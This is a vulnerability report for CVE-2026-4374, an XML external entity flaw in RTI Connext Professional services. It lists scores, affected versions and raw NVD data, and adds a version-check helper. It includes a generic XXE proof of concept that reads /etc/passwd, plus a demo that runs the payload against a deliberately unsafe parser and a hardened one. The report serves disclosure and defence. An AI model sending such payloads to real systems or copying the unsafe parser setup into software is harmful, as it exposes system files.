Security Vulnerability Report
CVE-2026-4374 CVSS 9.1 CRITICAL

Published: 2026-04-01 02:16:04
Last Modified: 2026-04-21 00:06:11
Source: 3f572a00-62e2-4423-959a-7ea25eff1638

Description

Improper Restriction of XML External Entity Reference vulnerability in RTI Connext Professional (Routing Service,Observability Collector,Recording Service,Queueing Service,Cloud Discovery Service) allows Serialized Data External Linking, Data Serializat...

Weakness: CWE-611 (Improper Restriction of XML External Entity Reference), as assigned by the reporting source in the raw record below. The description is truncated in this record; the full text is in the vendor advisory listed under References. Note that the description names the Connext Professional infrastructure services (Routing Service, Observability Collector, Recording Service, Queueing Service, Cloud Discovery Service) rather than the core libraries, while the CPE entries below apply to the product as a whole. The record does not say which input path (a configuration file, a document received over the network, or something else) reaches the affected XML parser, so exposure in a given deployment has to be judged against the advisory.

CVSS Details

CVSS 3.1 (primary): 9.1 CRITICAL
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
Exploitability subscore 3.9, impact subscore 5.2 (from the raw record below)

CVSS 4.0 (reporting source, secondary): 8.8 HIGH
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N

Both vectors describe an unauthenticated network attack with no user interaction, with high impact on confidentiality and availability and no integrity impact. That profile matches XXE: the external entity lets the parser disclose data the service process can read, and malicious entity definitions can also be used to exhaust the parser.

Configurations (Affected Products)

All five cpeMatch entries in the raw record use the same product CPE, cpe:2.3:a:rti:connext_professional:*:*:*:*:*:*:*:*, and differ only in version range:

5.3.0 through 5.3.1.45 (inclusive) - VULNERABLE
6.0.0 through 6.0.1.40 (inclusive) - VULNERABLE
6.1.0 through 6.1.2.27 (inclusive) - VULNERABLE
7.0.0 up to but excluding 7.3.1.1 - VULNERABLE
7.4.0 up to but excluding 7.7.0 - VULNERABLE

Affected components (per the description): Routing Service, Observability Collector, Recording Service, Queueing Service, Cloud Discovery Service. The record gives version ranges for the product as a whole, not per component.
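A small helper for checking an installed version against the ranges above. This is an added example, not RTI code or part of the NVD record; the five ranges are copied from the raw JSON below, and it assumes Connext versions are dotted numeric strings (as the record lists them).

```python
"""Added helper: check a Connext Professional version against the affected
ranges in this record. Not RTI code; ranges copied from the raw JSON."""

# (start_inclusive, end, end_inclusive) exactly as the five cpeMatch entries state them.
AFFECTED_RANGES = [
    ("5.3.0", "5.3.1.45", True),    # versionEndIncluding
    ("6.0.0", "6.0.1.40", True),
    ("6.1.0", "6.1.2.27", True),
    ("7.0.0", "7.3.1.1", False),    # versionEndExcluding
    ("7.4.0", "7.7.0", False),
]


def parse_version(text):
    """'7.3.0' -> (7, 3): trailing zeros are dropped so 7.3 == 7.3.0 == 7.3.0.0.

    Assumes dotted numeric versions, which is how the record lists them;
    anything else is rejected rather than silently compared.
    """
    parts = text.strip().split(".")
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    nums = [int(p) for p in parts]
    while nums and nums[-1] == 0:
        nums.pop()
    return tuple(nums)


def matching_range(version):
    """Return the (start, end, end_inclusive) entry covering `version`, or None."""
    v = parse_version(version)
    for start, end, end_inclusive in AFFECTED_RANGES:
        lo, hi = parse_version(start), parse_version(end)
        if v < lo:
            continue
        inside = (v <= hi) if end_inclusive else (v < hi)
        if inside:
            return (start, end, end_inclusive)
    return None


def is_affected(version):
    """True if `version` falls inside any range the record marks vulnerable."""
    return matching_range(version) is not None


if __name__ == "__main__":
    for v in ["5.3.1.45", "5.3.1.46", "7.3.0.5", "7.3.1.1", "7.6.1", "7.7.0"]:
        r = matching_range(v)
        print(f"{v:>9}: {'AFFECTED ' + repr(r) if r else 'not in any listed range'}")
```

The function reports exactly what the record lists and nothing more: a version between 7.3.1.1 and 7.4.0, for example, falls outside every listed range, which reflects the record's data rather than an independent claim about those builds. Confirm against the vendor advisory before treating such a version as unaffected.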

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- PoC for XXE vulnerability in CVE-2026-4374 -->
<!DOCTYPE data [
  <!ELEMENT data ANY>
  <!-- Define an external entity to read a local file -->
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

This is a generic XXE probe, not a Connext-specific exploit: the record does not say which input the affected services parse, so where this document has to be delivered to reach the vulnerable parser is not established on this page. The entity content is only visible to the attacker if the parsed value is echoed somewhere (in a response, a log, or an error message); a blind read like this one may expand the file without producing any observable output.
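To show what the PoC above actually does to an XML consumer, and what the fix looks like, here is an added, self-contained demonstration in Python. It is not RTI code and does not reproduce the Connext services' parser; it assumes a hypothetical consumer that parses attacker-supplied XML with external general entities enabled (the CWE-611 condition). The secret file and its contents are constructed for the demo, standing in for the /etc/passwd target in the PoC.

```python
"""Added demonstration of the XXE mechanism behind CVE-2026-4374 (not RTI code)."""
import io
import os
import tempfile
import xml.parsers.expat
import xml.sax
import xml.sax.handler

# Constructed secret: stands in for /etc/passwd in the page's PoC so the
# demonstration is self-contained and touches no real system files.
SECRET = "SECRET-TOKEN-12345"


class DtdRejected(ValueError):
    """Raised by the hardened parser when the document carries a DTD."""


def make_secret_file():
    """Write the constructed secret to a temp file and return its path."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-", suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(SECRET)
    return path


def build_payload(path):
    """Same document as the page's PoC, with the SYSTEM entity pointed at `path`."""
    url = "file://" + path  # POSIX path assumed; Windows separators would need converting
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE data [\n"
        "  <!ELEMENT data ANY>\n"
        f'  <!ENTITY xxe SYSTEM "{url}">\n'
        "]>\n"
        "<data>&xxe;</data>\n"
    ).encode("utf-8")


class _TextCollector(xml.sax.handler.ContentHandler):
    """Collects character data so we can see what the entity expanded to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def vulnerable_parse(xml_bytes):
    """Anti-pattern (hypothetical consumer): external general entities enabled.

    With feature_external_ges on, the SAX reader resolves the SYSTEM identifier
    of &xxe; and splices the file contents into the document's text, which is
    exactly the CWE-611 behaviour the record describes.
    """
    handler = _TextCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, True)  # the XXE switch
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts).strip()


def hardened_parse(xml_bytes):
    """Safe form: refuse any DTD up front and never install an entity resolver.

    Rejecting the DOCTYPE removes the place where entities are declared
    (also closing off entity-expansion denial of service); leaving
    ExternalEntityRefHandler unset and disabling parameter-entity parsing
    means nothing is fetched even if a DTD somehow slipped through.
    """
    p = xml.parsers.expat.ParserCreate()
    p.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parts = []

    def start_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise DtdRejected(f"DTD not allowed (DOCTYPE {doctype_name!r})")

    p.StartDoctypeDeclHandler = start_doctype
    p.CharacterDataHandler = parts.append
    p.Parse(xml_bytes, True)
    return "".join(parts).strip()


if __name__ == "__main__":
    path = make_secret_file()
    try:
        payload = build_payload(path)
        print("vulnerable parser returned:", repr(vulnerable_parse(payload)))
        try:
            hardened_parse(payload)
        except DtdRejected as exc:
            print("hardened parser refused:", exc)
        print("hardened parser on plain input:", repr(hardened_parse(b"<data>ok</data>")))
    finally:
        os.unlink(path)
```

The DOCTYPE check is done inside the parser rather than by grepping the bytes for "<!DOCTYPE", so a document in UTF-16 or another declared encoding cannot slip past it. When the consumer has to accept a DTD (schema validation, for instance), the fallback is the second layer shown here: no external entity resolver and parameter-entity parsing off.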

References

https://www.rti.com/vulnerabilities/#cve-2026-4374 (Vendor Advisory, as listed in the raw record below)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4374", "sourceIdentifier": "3f572a00-62e2-4423-959a-7ea25eff1638", "published": "2026-04-01T02:16:03.540", "lastModified": "2026-04-21T00:06:11.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Restriction of XML External Entity Reference vulnerability in RTI Connext Professional (Routing Service,Observability Collector,Recording Service,Queueing Service,Cloud Discovery Service) allows Serialized Data External Linking, Data Serializat..."}, {"lang": "es", "value": "Vulnerabilidad de restricción incorrecta de referencia a entidad externa XML en RTI Connext Professional (Routing Service, Observability Collector, Recording Service, Queueing Service, Cloud Discovery Service) permite el enlace externo de datos serializados, la serialización de datos..."}], "metrics": {"cvssMetricV40": [{"source": "3f572a00-62e2-4423-959a-7ea25eff1638", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "3f572a00-62e2-4423-959a-7ea25eff1638", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rti:connext_professional:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3.0", "versionEndIncluding": "5.3.1.45", "matchCriteriaId": "F8B1FE0A-A2E0-45AA-9ED2-CED9BDA02047"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rti:connext_professional:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndIncluding": "6.0.1.40", "matchCriteriaId": "8369CEAE-4767-4910-AD55-3C6E8898EE5F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rti:connext_professional:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0", "versionEndIncluding": "6.1.2.27", "matchCriteriaId": "2042782E-93AB-4D92-9DB0-3377557B5B46"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rti:connext_professional:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.3.1.1", "matchCriteriaId": 
"9F77FCD6-D5AC-46DF-99BF-D9E30919B5E4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rti:connext_professional:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.7.0", "matchCriteriaId": "DF87EB0F-A1CD-40D1-96F0-53D964E34BFC"}]}]}], "references": [{"url": "https://www.rti.com/vulnerabilities/#cve-2026-4374", "source": "3f572a00-62e2-4423-959a-7ea25eff1638", "tags": ["Vendor Advisory"]}]}}